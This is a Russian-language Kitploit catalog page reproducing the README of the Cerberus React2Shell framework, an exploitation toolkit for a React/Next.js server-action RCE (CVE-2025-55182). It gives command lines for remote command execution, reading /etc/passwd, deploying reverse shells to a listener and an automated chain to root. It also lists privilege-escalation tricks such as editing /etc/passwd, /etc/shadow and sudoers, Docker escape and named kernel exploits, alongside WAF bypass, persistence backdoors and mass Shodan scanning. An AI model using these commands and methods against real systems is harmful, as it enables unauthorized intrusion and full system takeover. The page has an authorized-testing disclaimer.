Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Cerberus-React2Shell-Scanner-Exploit — Элитный набор инструментов для эксплуатации CVE-2025-55182 (RCE в серверных компонентах React). Асинхронные полиморфные полезные нагрузки, продвинутый обход WAF/CDN, ротация прокси, массовое сканирование Shodan/Censys, авто-pwn + обратные шеллы, шаблоны Nuclei, лаборатория K8s и панель управления C2. Автор: Sudeepa Wanigarathna – строго для авторизованного тестирования на проникновение и red team. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
Фреймворки для пентестаПовышение привилегийСканеры уязвимостейФреймворки для эксплойтовШелл-кодЭксплуатация веб-приложенийПост-эксплуатацияКомандование и УправлениеОбучение и Образование
Red Teaming
Разработка Полезной Нагрузки
Лаборатории и Практика
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

Репозиторий
21818 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Элитный набор инструментов для эксплуатации CVE-2025-55182 (RCE в серверных компонентах React). Асинхронные полиморфные полезные нагрузки, продвинутый обход WAF/CDN, ротация прокси, массовое сканирование Shodan/Censys, авто-pwn + обратные шеллы, шаблоны Nuclei, лаборатория K8s и панель управления C2. Автор: Sudeepa Wanigarathna – строго для авторизованного тестирования на проникновение и red team.

Поделиться

Cerberus React2Shell - Weaponized Exploitation Framework

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 Обзор

Профессиональный фреймворк для эксплуатации уязвимости RCE в Server Actions Next.js (React2Shell). Демонстрирует полную цепочку атаки от первоначального доступа до повышения привилегий до root.

Возможности:

  • ✅ Автоматическое обнаружение уязвимости
  • ✅ Удалённое выполнение кода (RCE)
  • ✅ Интерактивный доступ к оболочке
  • ✅ Перечисление системы Linux
  • ✅ Автоматическое повышение привилегий
  • ✅ Развёртывание обратной оболочки
  • ✅ Загрузка/скачивание файлов
  • ✅ Демонстрация доступа root

🚀 Быстрый старт

Базовый RCE

root@kitploit:~
# Проверка уязвимости
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Выполнение команды
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

Интерактивная оболочка

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

Полная автоматизированная цепочка атаки

root@kitploit:~
# Полная эксплуатация: RCE → Перечисление → Доступ root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 Структура фреймворка

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # Основной движок эксплойта (400+ строк)
├── demo_exploit.py              # Автоматизированная цепочка атаки (290+ строк)
├── interactive_shell.py         # Интерактивная оболочка (280+ строк)
├── reverse_shell_handler.py     # Слушатель обратной оболочки (180+ строк)
├── post_exploit/
│   ├── linux_enum.py           # Перечисление системы (330+ строк)
│   ├── priv_esc.py             # Повышение привилегий (320+ строк)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # Полная документация по использованию
├── QUICKSTART.md                # Краткий справочник
└── BANNER.txt

🔥 Возможности

Основной движок эксплойта

  • Обнаружение Action ID: Автоматическое извлечение из JavaScript-бандлов
  • Несколько полезных нагрузок: Варианты execSync, spawn, eval, mainModule
  • Извлечение вывода: Разбор вывода команд из ответов об ошибках
  • Обход WAF: Методы обфускации полезных нагрузок

Пост-эксплуатация

  • Перечисление Linux: SUID/SGID-бинарники, доступные для записи пути, cron-задания, версия ядра
  • Повышение привилегий: GTFOBins, доступные для записи файлы /etc, побег из Docker, capabilities
  • Операции с файлами: Загрузка/скачивание с кодированием base64
  • Постоянство: Несколько методов бэкдора

Интерактивные инструменты

  • Интерактивная оболочка: Выполнение команд в реальном времени со встроенными командами
  • Обратная оболочка: Несколько типов оболочек (bash, python, nc, perl)
  • Демо-режим: Автоматизированная демонстрация из 6 шагов

📖 Примеры использования

1. Базовые команды

root@kitploit:~
# Проверка уязвимости
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Выполнение команд
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# Различные варианты полезных нагрузок
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# С обфускацией
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. Интерактивная оболочка

root@kitploit:~
# Запуск оболочки
python3 interactive_shell.py --target http://127.0.0.1:3000

# Доступные команды:
# - execute <cmd>        : Выполнить команду оболочки
# - enum                 : Запустить полное перечисление
# - escalate             : Попытка повышения привилегий
# - upload <local> <remote>  : Загрузить файл
# - download <remote> <local>: Скачать файл
# - shell <lhost> <lport>: Развернуть обратную оболочку
# - info                 : Показать информацию о сессии
# - exit                 : Выйти

3. Обратная оболочка

root@kitploit:~
# Терминал 1: Запуск слушателя
python3 reverse_shell_handler.py --lport 4444

# Терминал 2: Развёртывание оболочки
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. Автоматизированная демонстрация

root@kitploit:~
# Полная цепочка: Обнаружение → RCE → Перечисление → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 Цепочка атаки

Фреймворк реализует полную цепочку эксплуатации из 6 шагов:

  1. Обнаружение - Извлечение Server Action ID из JavaScript-бандлов
  2. Эксплуатация - Поиск рабочего Action ID и достижение RCE
  3. Проверка - Подтверждение выполнения кода командой id
  4. Перечисление - Сбор информации о системе, SUID-бинарниках, доступных для записи путях
  5. Повышение привилегий - Автоматическая эксплуатация векторов повышения привилегий
  6. Демонстрация - Доказательство доступа root чтением /etc/shadow и просмотром /root

🛡️ Методы повышения привилегий

Реализованные методы

  1. SUID-бинарники (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. Доступные для записи файлы /etc

    • /etc/passwd - Добавление нового пользователя root
    • /etc/shadow - Очистка пароля root
    • /etc/sudoers - Предоставление sudo без пароля (NOPASSWD)
  3. Побег из Docker

    • Эксплуатация доступного Docker-сокета
    • Выход из привилегированного контейнера
  4. Эксплойты ядра

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. Linux Capabilities

    • Эксплуатация CAP_SETUID, CAP_DAC_OVERRIDE

📊 Статистика

  • Всего строк кода: 1 800+
  • Модулей: 8
  • Методов повышения привилегий: 5
  • Вариантов полезных нагрузок: 4
  • Типов оболочек: 4 (bash, python, nc, perl)

⚙️ Требования

root@kitploit:~
pip install -r requirements.txt

Зависимости:

  • requests
  • colorama

📚 Документация

  • EXPLOITATION_GUIDE.md - Полное руководство по использованию с примерами
  • QUICKSTART.md - Краткий справочник по распространённым командам

⚠️ Отказ от ответственности

ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.

Автор не несёт ответственности за любое неправомерное использование этого инструмента. Используйте на свой страх и риск.

🎓 Образовательные цели

Этот фреймворк предназначен для:

  • Исследователей безопасности, изучающих уязвимости Next.js
  • Пентестеров с авторизацией
  • Обучения безопасности и CTF-задач
  • Исследования уязвимостей в контролируемых лабораторных средах

📄 Лицензия

Лицензия MIT (только в образовательных целях)

👤 Автор

Sudeepa Wanigarathna

  • Эксперт по разработке эксплойтов
  • Исследователь безопасности
  • Пентестер

Версия: 1.0
Последнее обновление: декабрь 2025

Подробные инструкции по использованию см. в EXPLOITATION_GUIDE.md

Скачать инструмент